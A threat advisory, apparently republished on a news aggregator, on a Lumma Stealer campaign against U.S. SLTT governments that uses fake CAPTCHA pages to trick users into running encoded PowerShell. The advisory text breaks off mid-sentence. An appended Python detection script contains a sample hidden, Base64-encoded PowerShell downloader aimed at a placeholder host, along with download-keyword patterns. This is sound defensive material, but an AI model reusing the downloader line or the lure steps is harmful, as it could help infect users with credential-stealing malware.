Security News

Cybersecurity news aggregator

MEDIUM Attacks Web Discovery

Active Lumma Stealer Campaign Impacting U.S. SLTTs

  • What: An active Lumma Stealer campaign is targeting U.S. State, Local, Tribal, and Territorial (SLTT) government organizations.
  • Impact: Victims are redirected to malicious webpages delivering a fake CAPTCHA verification prompt designed to trick users into running a PowerShell script, leading to malware infection.

By: The Center for Internet Security, Inc. (CIS®) Cyber Threat Intelligence (CTI) team
Published March 20, 2025

The CIS CTI team identified Lumma Stealer malware activity impacting U.S. State, Local, Tribal, and Territorial (SLTT) government organizations. CIS analysts observed multiple detections through CIS Endpoint Security Services (ESS) where SLTT victims are redirected to malicious webpages delivering a fake CAPTCHA verification prompt designed to trick users into running a PowerShell script. CIS ESS detected these fake CAPTCHA verification prompts due to Mshta running malicious JavaScript as well as the attempted PowerShell script. (Mshta is a Windows utility used to execute Microsoft HTML Application (HTA) files.) Once the PowerShell script runs on the victim's system, two additional PowerShell scripts are downloaded and run. A third PowerShell script containing a defense evasion technique and encrypted Windows binary code is compiled on the infected system into the .NET Lumma Stealer payload.

The CIS CTI team recommends that U.S. SLTT government entities remain aware of Lumma Stealer and other information stealer campaigns since they are widespread, opportunistic, and known to target sensitive data.

Background Information on Lumma Stealer

Lumma Stealer is an infostealer written in C that emerged on dark web forums in 2022. The cyber threat actors "Shamel," also known as "Lumma," sell Lumma Stealer as a Malware-as-a-Service (MaaS) subscription with various tiers. [1] Once cyber threat actors (CTAs) purchase Lumma Stealer, the malware enables them to target personally identifiable information (PII) on victims' systems such as credentials and banking information.

Depending on the tier CTAs purchase, the malware offers multiple defense evasion capabilities, including detecting virtualized environments, detecting user activity on the system, encrypting Lumma Stealer's executable to deter reverse engineering, bypassing signature detection, and utilizing polyglot files. [2] Lumma Stealer additionally employs a variety of techniques such as Living off the Land, specifically DLL sideloading, Mshta, PowerShell, process hollowing, SSH, and WMI. [3]

Two Incidents with Fake CAPTCHA Verifications

The current campaign uses malvertisement as an initial infection vector to deceive users into clicking malicious ads that lead to fake CAPTCHA verifications. CTAs use traffic distribution systems, content delivery networks, and compromised websites to spread malvertisements, which redirect end users to CTA-created webpages hosted on various providers. [4], [5]

After the victim clicks the "I'm not a robot" button in the fake CAPTCHA verification (Figure 1), they encounter unusual verification steps, which include:

  • Press Windows button + R
  • Press CTRL+V
  • Press Enter

Figure 1: Fake CAPTCHA verification steps. (Source: Qualys)

These steps execute a PowerShell command that leads to a Lumma Stealer download. The CIS CTI team analyzed two specific incidents associated with this activity based on CIS ESS detections, as described below. [6]

Incident One

In the first incident, the victim's browser redirected to a fake CAPTCHA verification webpage housing obfuscated JavaScript as well as a Base64-encoded PowerShell script. CIS ESS detected the obfuscated JavaScript in the command line. Figure 2 shows the de-obfuscated script that ran in the command line.

Figure 2: De-obfuscated script that was run in the command line.

After the victim completed the verification steps, the encoded PowerShell script ran on their machine. Figure 3 shows that the decoded PowerShell script was hidden and attempted to download a file. CIS ESS blocked this activity. If not blocked, the downloaded file would have run an obfuscated and encoded PowerShell script, downloading the final Lumma Stealer payload.

Figure 3: Decoded PowerShell script is hidden and attempting to download a file.

Incident Two

Like in the first incident, the victim in the second incident was redirected from a compromised or malicious webpage to a fake CAPTCHA verification page. CIS ESS once again detected the obfuscated JavaScript in the command line using Mshta. Figure 3 shows the de-obfuscated script. However, the PowerShell script had additional obfuscation, including strings with additional Base64 encoding, as shown in Figure 4.

Figure 4: Base64-encoded PowerShell script.

As shown in Figure 5, the decoded PowerShell script included substantial amounts of junk code, but the end of the decoded script contained a PowerShell script that similarly attempted to download a file. Despite looking like a database file, Handler.db was another encoded PowerShell script.

Figure 5: Decoded PowerShell script.

This encoded PowerShell script was heavily obfuscated; however, CIS analysts discovered a PowerShell command in the first half of the script that identified whether the
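Detection logic for the execution chain the two incidents describe (Mshta launched with inline JavaScript, then a hidden, Base64-encoded PowerShell stage that attempts a download), as an added example that is not part of the CIS post. It runs over constructed process-creation events; the Sysmon-style field names, the sample command lines, the host name and the label names are all assumptions.

```python
import base64
import re

# Constructed process-creation events with Sysmon-style field names (an assumed layout).
STAGE2 = "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta javascript:placeholder_obfuscated_js"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe", "Image": PS,
     "CommandLine": f"powershell -w hidden -enc {ENCODED}"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -NoProfile -Command Get-Process"},  # benign admin use
]

ENC_FLAG = re.compile(r"^-(e|ec|enc|encodedcommand)$", re.I)
HIDDEN_FLAG = re.compile(r"^-w(indowstyle)?$", re.I)
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)

def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand (or an alias), else None."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if ENC_FLAG.match(tok):
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def classify(event):
    """Return the detection labels that fire for one process-creation event."""
    labels, image, cmd = [], event["Image"].lower(), event["CommandLine"]
    if image.endswith("mshta.exe") and re.search(r"javascript:|https?://", cmd, re.I):
        labels.append("mshta_inline_script")  # script or URL handed straight to mshta
    if image.endswith("powershell.exe"):
        toks = cmd.split()
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            labels.append("powershell_encoded")
            if DOWNLOAD_RE.search(decoded):
                labels.append("encoded_downloader")  # the encoded stage fetches more code
        if any(HIDDEN_FLAG.match(t) and toks[i + 1].lower().startswith("h")
               for i, t in enumerate(toks[:-1])):
            labels.append("hidden_window")
        if event["ParentImage"].lower().endswith("mshta.exe"):
            labels.append("mshta_parent")  # the mshta -> PowerShell chain from the post
    return labels
```

Decoding the encoded argument before matching matters here: the download keywords in the second event are invisible in the raw command line, so a rule that only greps the command line would miss it.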
